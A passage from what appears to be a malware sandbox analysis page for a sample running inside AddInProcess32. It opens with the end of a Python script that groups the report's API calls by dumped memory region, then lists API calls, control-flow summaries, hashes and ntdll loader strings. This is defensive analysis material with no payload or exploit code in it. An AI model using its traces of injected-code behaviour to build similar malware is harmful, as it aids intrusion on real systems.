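                "based_on_pe": m["pe"] == "true",
                "apis": pending,
            })
            pending = []
    return records


def apis_by_region(records):
    """Region base -> sorted API names: a quick capability view of each dumped region."""
    seen = defaultdict(set)
    for r in records:
        for call in r["apis"]:
            seen[r["base"]].add(call["api"])
    return {base: sorted(names) for base, names in seen.items()}


def thread_message_posts(records, message=WM_COMMAND):
    """(base, ref) of every PostThreadMessageW whose Msg argument equals `message`."""
    hits = set()
    for r in records:
        for call in r["apis"]:
            args = call["args"]
            if call["api"] == "PostThreadMessageW" and len(args) > 1 and args[1] == message:
                hits.add((r["base"], call["ref"]))
    return sorted(hits)


# Constructed sample: entries copied from the listing on this page.
SAMPLE = """\
APIs
• RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
Memory Dump Source
• Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
APIs
• RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
Memory Dump Source
• Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
Memory Dump Source
• Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
APIs
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
"""

if __name__ == "__main__":
    recs = parse_listing(SAMPLE)
    for base, names in apis_by_region(recs).items():
        print(f"{base:#x}: {', '.join(names)}")
    print("WM_COMMAND thread posts:", [(f"{b:#x}", f"{r:#x}") for b, r in thread_message_posts(recs)])
```

Feed the whole exported listing to parse_listing instead of SAMPLE to get the same grouping for every function the report covers; entries with no "APIs" lines (the InitializeThunk stubs in the 0x1790000 region) yield a record with an empty call list, so they stay visible but do not pollute the per-region API view.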

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 228 408310-40831f 229 408328-40835a call 41c9d0 call 40acf0 call 414e50 228->229 230 408323 call 41be30 228->230 237 40835c-40836e PostThreadMessageW 229->237 238 40838e-408392 229->238 230->229 239 408370-40838a call 40a480 237->239 240 40838d 237->240 239->240 240->238
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                                                                                                        • Opcode ID: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
                                                                                                                                                                                                                                        • Instruction ID: 43d593e10ad008c4695c17d6314bf6f3e92d4c432431edd93db89b762a987e15
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2018471A8032877E720A6959D43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
control_flow_graph 270 41a640-41a671 call 41af30 RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
Memory Dump Source
• Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
• Instruction ID: 3f65de21c9b51a2b7742007d51c6b1fad19b07b0b1b2c98d2bb582ee848745b4
• Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
• Instruction Fuzzy Hash: 1EE046B1210208ABDB18EF99CC49EE777ACEF88764F018559FE085B242C630F911CAF0

Control-flow Graph

control_flow_graph 273 41a798-41a7ba call 41af30 275 41a7bf-41a7d4 LookupPrivilegeValueW 273->275
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
Memory Dump Source
• Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: 9c266a6aefa043eef56ce47c70910f57336f36220142ecbba6524ada9874fc7c
• Instruction ID: 52e859f7db3b5eec8f1b2cf86b3cd4034eeaf09a87e8161dea303a82fb816005
• Opcode Fuzzy Hash: 9c266a6aefa043eef56ce47c70910f57336f36220142ecbba6524ada9874fc7c
• Instruction Fuzzy Hash: 02E09AB92002046FCB10EF45CC80EE73BA9AF88354F018069FE085B241C634E812CBB4
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
Memory Dump Source
• Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
• Instruction ID: a195d06a74d451d332e2306e76e7c3aa502b90bd3f16d73f11471c4c6d802808
• Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
• Instruction Fuzzy Hash: 2FE01AB12102086BDB10DF49CC85EE737ADAF88654F018155BA0857241C934E8118BF5
APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
Memory Dump Source
• Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
• Instruction ID: 026b6f0270740822b369349059f6971daea101c61a9fac8a7aff4918670f7806
• Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
• Instruction Fuzzy Hash: C1D017726112187BD620EB99CC85FD777ACDF487A4F0180AABA1C6B242C531BA11CAE1
APIs
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b9ccb88c88a8c8ea967ac36607a383b5e00c26888a5f25347c7e9ce454bae86e
• Instruction ID: 450d17dcebef1bfb723e773a3134e069cc8c8590a95641f685744330311b5f63
• Opcode Fuzzy Hash: b9ccb88c88a8c8ea967ac36607a383b5e00c26888a5f25347c7e9ce454bae86e
• Instruction Fuzzy Hash: 12B09B739415C5CEDA52E7644A0D717790577D2701F15C065D3034685F8778C2D5E276
Strings
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
• API String ID: 0-2160512332
• Opcode ID: 615bb80df6310a48fa5d6b65a486fdee19ee692b6289ee6e83ee0bca06b6723d
• Instruction ID: 7a13e561b814aaffe141a62ca7f36e7d3149168f724ef5a11c8f655291733da4
• Opcode Fuzzy Hash: 615bb80df6310a48fa5d6b65a486fdee19ee692b6289ee6e83ee0bca06b6723d
• Instruction Fuzzy Hash: B092D07160834AAFE721DF18C884B6BBBEABF84714F04491DFA94D7251DB70EA44CB52
Strings
• double initialized or corrupted critical section, xrefs: 01835508
• Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018354CE
• Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0183540A, 01835496, 01835519
• Critical section address, xrefs: 01835425, 018354BC, 01835534
• undeleted critical section in freed memory, xrefs: 0183542B
• Critical section debug info address, xrefs: 0183541F, 0183552E
• 8, xrefs: 018352E3
• Address of the debug info found in the active list., xrefs: 018354AE, 018354FA
• Invalid debug info address of this critical section, xrefs: 018354B6
• corrupted critical section, xrefs: 018354C2
• First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018354E2
• Critical section address., xrefs: 01835502
• Thread identifier, xrefs: 0183553A
• Thread is in a state in which it cannot own a critical section, xrefs: 01835543
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• API String ID: 0-2368682639
• Opcode ID: b4d1fa02458abe525d5d44274fccf062e07835c885f2f52cde2f51ed49376394
• Instruction ID: 222ae7f2eb1a7c27f5577d57c0038f65893e78e95b497fb6a3ddfc801aedf822
• Opcode Fuzzy Hash: b4d1fa02458abe525d5d44274fccf062e07835c885f2f52cde2f51ed49376394
• Instruction Fuzzy Hash: 95819DB0A40348EFDB20CF99C884BAEFBB5BB88B05F544119F504F7280D3B5AA44CB91
Strings
• SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018322E4
                                                                                                                                                                                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018324C0
                                                                                                                                                                                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018325EB
                                                                                                                                                                                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01832409
                                                                                                                                                                                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01832602
                                                                                                                                                                                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01832624
                                                                                                                                                                                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01832498
                                                                                                                                                                                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0183261F
                                                                                                                                                                                                                                        • @, xrefs: 0183259B
                                                                                                                                                                                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01832412
                                                                                                                                                                                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01832506
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                                                                                        • API String ID: 0-4009184096
                                                                                                                                                                                                                                        • Opcode ID: cba7b98d93d2b81843606960ff0c05612e847c5102a362f1061c01c4db72218d
                                                                                                                                                                                                                                        • Instruction ID: 1d0c8b4310f8e322e5d70f9222d6655ca3a74257d2ffd306fceb0f9f72fd992f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cba7b98d93d2b81843606960ff0c05612e847c5102a362f1061c01c4db72218d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 090261F1D002299BDB21DB58CC80B9AF7B8AF54304F4441DAA749E7242EB719F84CF99
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                                                                        • API String ID: 0-2515994595
                                                                                                                                                                                                                                        • Opcode ID: 549c32f5bcf9a45a20741af671f120870612f8aa723317d8bc02116fafa156f4
                                                                                                                                                                                                                                        • Instruction ID: b094aad1eb833fd1eeaa54c64ae4628f64a4e66613043faa0b51948461b5f76d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 549c32f5bcf9a45a20741af671f120870612f8aa723317d8bc02116fafa156f4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5051F3711143059BC729DF189844BABBBECFF9A354F14092DEA99C7284E770D708CBA2
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                                                        • API String ID: 0-1700792311
                                                                                                                                                                                                                                        • Opcode ID: c36cce4e8eb34956008fe080121732ec9efdfa024b202d4e2b9fe619f16a5cd9
                                                                                                                                                                                                                                        • Instruction ID: fee6757f093ed68e444365767b89d52277c62626c355f63f1942d51426c7eb08
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c36cce4e8eb34956008fe080121732ec9efdfa024b202d4e2b9fe619f16a5cd9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60D1EE7150468ADFDB22DF68C495AA9FBF1FF4A704F088059F846DB252C734EA81CB14
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • HandleTraces, xrefs: 01848C8F
                                                                                                                                                                                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01848A67
                                                                                                                                                                                                                                        • VerifierDlls, xrefs: 01848CBD
                                                                                                                                                                                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01848A3D
                                                                                                                                                                                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01848B8F
                                                                                                                                                                                                                                        • VerifierDebug, xrefs: 01848CA5
                                                                                                                                                                                                                                        • VerifierFlags, xrefs: 01848C50
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                                                                        • API String ID: 0-3223716464
                                                                                                                                                                                                                                        • Opcode ID: 62ba837ce6cace66851ccde789b4182881500c789792e48892a7e88db5233147
                                                                                                                                                                                                                                        • Instruction ID: e3e46ddb7b294f84a97097b82ff33ca517e31e475fd979b58dd3dfd6093697a3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62ba837ce6cace66851ccde789b4182881500c789792e48892a7e88db5233147
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 489128B1A4631A9FD722DFACC8C0B5BB7E4AB56718F440518FA45EB241DB709F00CB95
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                                                                        • API String ID: 0-1109411897
                                                                                                                                                                                                                                        • Opcode ID: 151a0de3fd0ed1bfeb811f4013819ba32924035ece74ecfc2f690dffb7d5abae
                                                                                                                                                                                                                                        • Instruction ID: 8a3df22419d5236c4589f1f0abceb048d915e35d971c48740847ed7c5a4bebde
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 151a0de3fd0ed1bfeb811f4013819ba32924035ece74ecfc2f690dffb7d5abae
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3FA23974A0562A8FDB65CF18C888BA9FBB5AF49704F1442EED90DA7250DB309EC5CF10
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                        • API String ID: 0-792281065
                                                                                                                                                                                                                                        • Opcode ID: 1fbc1c23d5f506248f74aa55e7f4a5caf2bb571d70fd7458b7fa6a5640a020ce
                                                                                                                                                                                                                                        • Instruction ID: 4fecb9d7629534c601409bfa96fc620e0a0526d397d7a8266087d9588c395bd2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1fbc1c23d5f506248f74aa55e7f4a5caf2bb571d70fd7458b7fa6a5640a020ce
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70912870B017159BDB35EF58D899BAABBA1BB91B14F18022CEA00F7385D7749B01CBD1
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01819A2A
                                                                                                                                                                                                                                        • apphelp.dll, xrefs: 017B6496
                                                                                                                                                                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01819A01
                                                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01819A11, 01819A3A
                                                                                                                                                                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018199ED
                                                                                                                                                                                                                                        • LdrpInitShimEngine, xrefs: 018199F4, 01819A07, 01819A30
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                        • API String ID: 0-204845295
                                                                                                                                                                                                                                        • Opcode ID: af9273012d9abfcf5bed1e93762ac5c4850037d0c14a81534b2c9b70c8cba37b
                                                                                                                                                                                                                                        • Instruction ID: 6fe1237ce6c5185fdca35b30b0501d610d3a119822ef31e0b742fc3511e844c6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af9273012d9abfcf5bed1e93762ac5c4850037d0c14a81534b2c9b70c8cba37b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC51B1726483049FD720DF24D8A5B9BB7E8FF84748F54091DFA8597195D730EA08CB92
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01832165
                                                                                                                                                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0183219F
                                                                                                                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01832180
                                                                                                                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01832178
                                                                                                                                                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01832160, 0183219A, 018321BA
                                                                                                                                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018321BF
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                                                        • API String ID: 0-861424205
                                                                                                                                                                                                                                        • Opcode ID: 1a473f2784b470388d3933b3484b7d765486d853f4e9c764dd042c6e66a81b24
                                                                                                                                                                                                                                        • Instruction ID: 97614b18b325998da436e25ee9e7cc2e124f48952f7bca0eb9a58502732e221b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a473f2784b470388d3933b3484b7d765486d853f4e9c764dd042c6e66a81b24
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B312276B412257BEB219A9A8C51F5FFB69DBE4B50F09015DFB04AB241D270EF00C6E1
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01838170
                                                                                                                                                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 018381E5
                                                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017FC6C3
                                                                                                                                                                                                                                        • LdrpInitializeProcess, xrefs: 017FC6C4
                                                                                                                                                                                                                                        • LdrpInitializeImportRedirection, xrefs: 01838177, 018381EB
                                                                                                                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01838181, 018381F5
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                        • API String ID: 0-475462383
                                                                                                                                                                                                                                        • Opcode ID: 12d93916264e0fa6c3cf93a833358454bfa852fb5a511481b8215c29e1262309
                                                                                                                                                                                                                                        • Instruction ID: e3d64888b39f5c53283ada4627dae2dd0620e30a9d1cceb78d04dda113effca4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12d93916264e0fa6c3cf93a833358454bfa852fb5a511481b8215c29e1262309
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F631E4B16447469BD224EF2CDC8AE1BF7D4AFD4B10F04065CF984AB395D620EE04CBA2
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 01802DF0: LdrInitializeThunk.NTDLL ref: 01802DFA
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01800BA3
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01800BB6
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01800D60
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01800D74
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
